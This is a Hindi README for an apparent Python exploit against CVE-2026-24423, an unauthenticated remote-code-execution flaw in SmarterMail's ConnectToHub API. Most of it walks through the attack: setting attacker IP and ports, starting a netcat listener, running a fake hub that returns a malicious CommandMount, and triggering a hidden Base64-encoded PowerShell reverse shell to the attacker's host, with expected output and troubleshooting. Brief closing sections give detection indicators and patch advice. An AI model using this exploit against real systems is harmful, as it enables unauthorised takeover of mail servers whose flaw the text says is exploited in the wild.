
CVE-2026-24423 के लिए एक्सप्लॉइट — SmarterMail के ConnectToHub API में एक गंभीर बिना प्रमाणीकरण वाला RCE। बिल्ड 9511 से पहले के सभी संस्करणों को प्रभावित करता है।
CVE-2026-24423 के लिए एक Python-आधारित एक्सप्लॉइट, जो SmarterTools SmarterMail के ConnectToHub कार्यक्षमता में एक बिना प्रमाणीकरण वाली रिमोट कोड एक्सेक्यूशन भेद्यता है।
इच्छित उपयोग: केवल अधिकृत सुरक्षा परीक्षण, CTF, Hack The Box लैब्स, और नियंत्रित अनुसंधान वातावरण।
CVE-2026-24423 SmarterTools SmarterMail को प्रभावित करने वाली एक बिना प्रमाणीकरण वाली रिमोट कोड एक्सेक्यूशन भेद्यता है।
यह भेद्यता ConnectToHub कार्यक्षमता में मौजूद है। एक बिना प्रमाणीकरण वाला हमलावर एक दुर्भावनापूर्ण प्रदान कर सकता है, जिससे SmarterMail सर्वर हमलावर-नियंत्रित सर्वर पर एक HTTP अनुरोध करता है।
hubAddressदुर्भावनापूर्ण सर्वर एक निर्मित setup-initial-connection प्रतिक्रिया के साथ उत्तर देता है जिसमें एक नियंत्रित SystemMount.CommandMount मान होता है।
कमजोर SmarterMail इंस्टेंस बाद में इस मान को ऑपरेटिंग-सिस्टम कमांड के रूप में संसाधित करता है, जिससे SmarterMail सेवा के सुरक्षा संदर्भ में मनमाना कमांड निष्पादन संभव होता है।
इस भेद्यता को CVSS 4.0 स्कोर 9.3 (क्रिटिकल) दिया गया है और इसे CWE-306: महत्वपूर्ण कार्य के लिए लापता प्रमाणीकरण के रूप में वर्गीकृत किया गया है।
| फ़ील्ड | मान |
|---|---|
| CVE | CVE-2026-24423 |
| विक्रेता | SmarterTools |
| उत्पाद | SmarterMail |
| भेद्यता | बिना प्रमाणीकरण वाली रिमोट कोड एक्सेक्यूशन |
| CWE | CWE-306 |
| CVSS v4.0 | 9.3 क्रिटिकल |
| CVSS v3.1 | 9.8 क्रिटिकल |
| हमला वेक्टर | नेटवर्क |
| प्रमाणीकरण | कोई नहीं |
| उपयोगकर्ता सहभागिता | कोई नहीं |
| जटिलता | कम |
| प्रकाशित | 23 जनवरी, 2026 |
| स्थिर बिल्ड | 9511 |
आधिकारिक CVE रिकॉर्ड इस मुद्दे को ConnectToHub API विधि के माध्यम से एक बिना प्रमाणीकरण वाले RCE के रूप में वर्णित करता है।
SmarterMail संस्करण बिल्ड 9511 से पहले प्रभावित हैं।
CVE रिकॉर्ड प्रभावित सीमा निर्दिष्ट करता है:
SmarterMail < 100.0.9511
बिल्ड 9511, 15 जनवरी, 2026 को जारी, में विक्रेता का फिक्स शामिल है।
< 100.0.9511
>= 100.0.9511
भेद्यता को पुन: उत्पन्न करने का प्रयास करने से पहले हमेशा सटीक स्थापित बिल्ड सत्यापित करें।
कमजोर कार्यक्षमता SmarterMail सिस्टम प्रशासन API के माध्यम से उजागर होती है।
प्रासंगिक ऑपरेशन है:
/api/v1/settings/sysadmin/connect-to-hub
एंडपॉइंट एक hubAddress पैरामीटर स्वीकार करता है।
अवधारणात्मक रूप से, एक हमलावर प्रदान कर सकता है:
{
"hubAddress": "http://ATTACKER_IP:8081",
"oneTimePassword": "temporary-value",
"nodeName": "DC"
}
SmarterMail फिर आपूर्ति किए गए हब पते से कनेक्ट होता है और अनुरोध करता है:
/web/api/node-management/setup-initial-connection
हमलावर-नियंत्रित सर्वर एक दुर्भावनापूर्ण SystemMount ऑब्जेक्ट युक्त JSON के साथ उत्तर देता है।
महत्वपूर्ण गुण है:
"SystemMount": {
"Enabled": true,
"ReadOnly": false,
"MountPath": "...",
"CommandMount": "..."
}
CommandMount मान बाद में कमजोर एप्लिकेशन द्वारा ऑपरेटिंग-सिस्टम कमांड के रूप में उपयोग किया जाता है।
यह एक हमलावर को इससे संक्रमण करने की अनुमति देता है:
बिना प्रमाणीकरण वाला HTTP अनुरोध
इस तक:
रिमोट कमांड निष्पादन
VulnCheck का तकनीकी विश्लेषण पुष्टि करता है कि हमलावर-नियंत्रित hubAddress SmarterMail को हमलावर के setup-initial-connection एंडपॉइंट का अनुरोध करने का कारण बनता है और लौटाया गया CommandMount मनमाना कमांड निष्पादन प्रदान कर सकता है।
एक्सप्लॉइट में दो घटक होते हैं:
Python सर्वर इसके लिए सुनता है:
POST /web/api/node-management/setup-initial-connection
और दुर्भावनापूर्ण SystemMount.CommandMount युक्त एक निर्मित JSON प्रतिक्रिया लौटाता है।
एक अलग TCP लिसनर लक्ष्य पर निष्पादित कमांड द्वारा शुरू किए गए कनेक्शन को प्राप्त करता है।
यह एक्सप्लॉइट जानबूझकर दो अलग-अलग पोर्ट का उपयोग करता है।
8081
└── नकली SmarterMail हब
4455
└── रिवर्स शेल लिसनर
flowchart LR
A[हमलावर<br/>10.10.14.50]
H[नकली SmarterMail हब<br/>TCP/8081]
T[SmarterMail लक्ष्य<br/>10.129.57.86]
C[CommandMount<br/>कमांड निष्पादन]
P[PowerShell]
L[रिवर्स शेल लिसनर<br/>TCP/4455]
A -->|ConnectToHub ट्रिगर करें| T
T -->|HTTP POST| H
H -->|दुर्भावनापूर्ण JSON| T
T -->|CommandMount| C
C --> P
P -->|रिवर्स TCP| L
L --> Aलक्ष्य
|
| HTTP
v
10.10.14.50:8081
लक्ष्य
|
| TCP
v
10.10.14.50:4455
ये पोर्ट अलग-अलग उद्देश्यों की पूर्ति करते हैं और इन्हें भ्रमित नहीं किया जाना चाहिए।
एक्सप्लॉइट केवल Python मानक-लाइब्रेरी मॉड्यूल का उपयोग करता है:
http.server
json
base64
कोई बाहरी Python पैकेज आवश्यक नहीं है।
निम्नलिखित वेरिएबल संपादित करें:
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081
उदाहरण HTB वातावरण के लिए:
LHOST = 10.10.14.50
LPORT = 4455
HUB_PORT = 8081
LHOST हमलावर का IP पता है जिसे लक्ष्य तक पहुँच सकता है।
Hack The Box के लिए, यह आमतौर पर HTB VPN इंटरफ़ेस को सौंपा गया IP होता है:
ip addr show tun0
उदाहरण:
tun0:
inet 10.10.14.50
इसलिए:
LHOST = "10.10.14.50"
LPORT वह TCP पोर्ट है जिसका उपयोग हमलावर रिवर्स कनेक्शन प्राप्त करने के लिए करता है।
उदाहरण:
LPORT = 4455
HUB_PORT दुर्भावनापूर्ण SmarterMail हब द्वारा उपयोग किया जाने वाला HTTP पोर्ट है।
उदाहरण:
HUB_PORT = 8081
git clone https://github.com/<username>/<repository>.git
cd <repository>
संपादित करें:
nano exploit.py
सेट करें:
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081
एक टर्मिनल खोलें:
nc -lvnp 4455
अपेक्षित:
Listening on 0.0.0.0 4455
इस टर्मिनल को खुला रखें।
दूसरा टर्मिनल खोलें:
python3 exploit.py
यदि चयनित पोर्ट से बाइंडिंग के लिए उन्नत विशेषाधिकारों की आवश्यकता हो:
sudo python3 exploit.py
अपेक्षित आउटपुट:
============================================================
SmarterMail नकली हब
============================================================
[+] LHOST: 10.10.14.50
[+] LPORT: 4455
[+] HUB: 10.10.14.50:8081
[+] SmarterMail की प्रतीक्षा कर रहा है...
============================================================
कमजोर SmarterMail इंस्टेंस को उपयुक्त अनुरोध भेजें।
आपूर्ति किया गया hubAddress दुर्भावनापूर्ण HTTP सर्वर की ओर इंगित करना चाहिए:
{
"hubAddress": "http://10.10.14.50:8081",
"oneTimePassword": "tempst",
"nodeName": "DC"
}
महत्वपूर्ण मान है:
http://10.10.14.50:8081
रिवर्स-शेल पोर्ट को हब पोर्ट के रूप में उपयोग न करें।
| उद्देश्य | IP | पोर्ट |
|---|---|---|
| हमलावर VPN | 10.10.14.50 | — |
| नकली SmarterMail हब | 10.10.14.50 | 8081 |
| रिवर्स शेल | 10.10.14.50 | 4455 |
| HTB लक्ष्य | 10.129.57.86 | — |
परिणामी प्रवाह है:
hubAddress
↓
10.10.14.50:8081
↓
दुर्भावनापूर्ण CommandMount
↓
PowerShell
↓
10.10.14.50:4455
एक्सप्लॉइट गतिशील रूप से PowerShell पेलोड बनाता है।
PowerShell का -EncodedCommand पैरामीटर अपेक्षा करता है कि कमांड को Base64 एन्कोडिंग से पहले UTF-16LE का उपयोग करके एन्कोड किया जाए।
स्क्रिप्ट निष्पादित करती है:
encoded = base64.b64encode(
PS.encode("utf-16le")
).decode()
अंतिम कमांड इस प्रकार संरचित है:
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>
यह पेलोड को मैन्युअल रूप से एन्कोड करने से बचाता है और सामान्य UTF-8/UTF-16LE एन्कोडिंग त्रुटियों को रोकता है।
जब लक्ष्य दुर्भावनापूर्ण हब तक पहुँचता है:
[+] SmarterMail कनेक्शन प्राप्त हुआ
[+] पथ: /web/api/node-management/setup-initial-connection
[+] बॉडी: ...
[+] CommandMount पेलोड भेजा जा रहा है
[+] रिवर्स शेल -> 10.10.14.50:4455
रिवर्स-शेल लिसनर को बाद में एक कनेक्शन प्राप्त करना चाहिए:
Connection received on 10.129.57.86 XXXXX
कनेक्ट होने के बाद, बुनियादी सत्यापन किया जा सकता है:
whoami
hostname
जाँचें कि सर्वर सुन रहा है:
ss -lntp | grep 8081
VPN पता सत्यापित करें:
ip addr show tun0
पुष्टि करें कि LHOST लक्ष्य से पहुँच योग्य पते से मेल खाता है।
एक सफल HTTP अनुरोध का मतलब है कि पहला चरण काम कर रहा है:
लक्ष्य
|
| HTTP
v
नकली हब :8081
इसका आवश्यक रूप से यह मतलब नहीं है कि दूसरा चरण सफल हुआ।
जाँचें:
ss -lntp | grep 4455
सुनिश्चित करें कि Netcat एक्सप्लॉइट ट्रिगर करने से पहले शुरू किया गया था।
साथ ही सत्यापित करें:
LHOST = लक्ष्य-पहुँच योग्य हमलावर IP
LPORT = लिसनर पोर्ट
यदि आप Netcat के अंदर यह देखते हैं:
POST /web/api/node-management/setup-initial-connection
तो आपने hubAddress को रिवर्स-शेल लिसनर की ओर इंगित किया है।
गलत:
hubAddress = http://10.10.14.50:4455
सही:
hubAddress = http://10.10.14.50:8081
दोनों पोर्ट अलग रहने चाहिए।
400 प्रतिक्रिया तब हो सकती है जब नकली हब SmarterMail द्वारा अपेक्षित संरचना नहीं लौटाता।
सत्यापित करें कि प्रतिक्रिया में शामिल है:
"SystemMount": {
"Enabled": true,
"ReadOnly": false,
"MountPath": "...",
"CommandMount": "..."
}
साथ ही सुनिश्चित करें कि अनुरोधित पथ बिल्कुल यही है:
/web/api/node-management/setup-initial-connection
सार्वजनिक भेद्यता विश्लेषण इस एंडपॉइंट को कमजोर ConnectToHub प्रवाह के भाग के रूप में पहचानता है।
HTB लैब से स्क्रीनशॉट यहाँ जोड़ें।
उदाहरण:

सुझाए गए स्क्रीनशॉट:

दिखाएँ:
[+] SmarterMail कनेक्शन प्राप्त हुआ
[+] CommandMount पेलोड भेजा जा रहा है

अनुरोध दिखाएँ जिसमें शामिल है:
{
"hubAddress": "http://10.10.14.50:8081"
}

दिखाएँ:
Connection received on 10.129.57.86
और परिणामी कमांड प्रॉम्प्ट।
smartermail-rce/
│
├── exploit.py
├── README.md
│
└── screenshots/
├── nmap.png
├── burp-request.png
├── fake-hub.png
└── reverse-shell.png
एक्सप्लॉइटेशन के संभावित संकेतकों में इसके लिए अप्रत्याशित अनुरोध शामिल हैं:
/api/v1/settings/sysadmin/connect-to-hub
और SmarterMail सर्वर से पहले से अज्ञात HTTP होस्ट्स के लिए आउटबाउंड कनेक्शन।
प्रशासकों को संदिग्ध ConnectToHub गतिविधि के लिए एप्लिकेशन, IIS/रिवर्स-प्रॉक्सी, और नेटवर्क लॉग की भी समीक्षा करनी चाहिए।
CVE-2026-24423 को CISA की Known Exploited Vulnerabilities सूची में शामिल किया गया है, जो दर्शाता है कि प्रयोगशाला वातावरण के बाहर एक्सप्लॉइटेशन देखा गया है।
प्राथमिक उपाय SmarterMail को बिल्ड 9511 या बाद में अपग्रेड करना है। विक्रेता के 15 जनवरी, 2026 के रिलीज़ ने भेद्यता को संबोधित किया।
जहाँ तत्काल पैचिंग संभव नहीं है, वहाँ संगठनों को अतिरिक्त रूप से विचार करना चाहिए:
ConnectToHub अनुरोधों के लिए ऐतिहासिक लॉग की समीक्षा करना।यह प्रोजेक्ट अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
इस एक्सप्लॉइट का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।
लेखक इस सॉफ़्टवेयर के उपयोग से उत्पन्न दुरुपयोग, क्षति, डेटा हानि, अनधिकृत पहुँच, या अन्य परिणामों के लिए कोई ज़िम्मेदारी नहीं लेता है।
केवल नियंत्रित वातावरण में उपयोग करें जैसे:
CVE-2026-24423 का श्रेय इन्हें दिया गया:
CVE को VulnCheck द्वारा 23 जनवरी, 2026 को प्रकाशित किया गया था।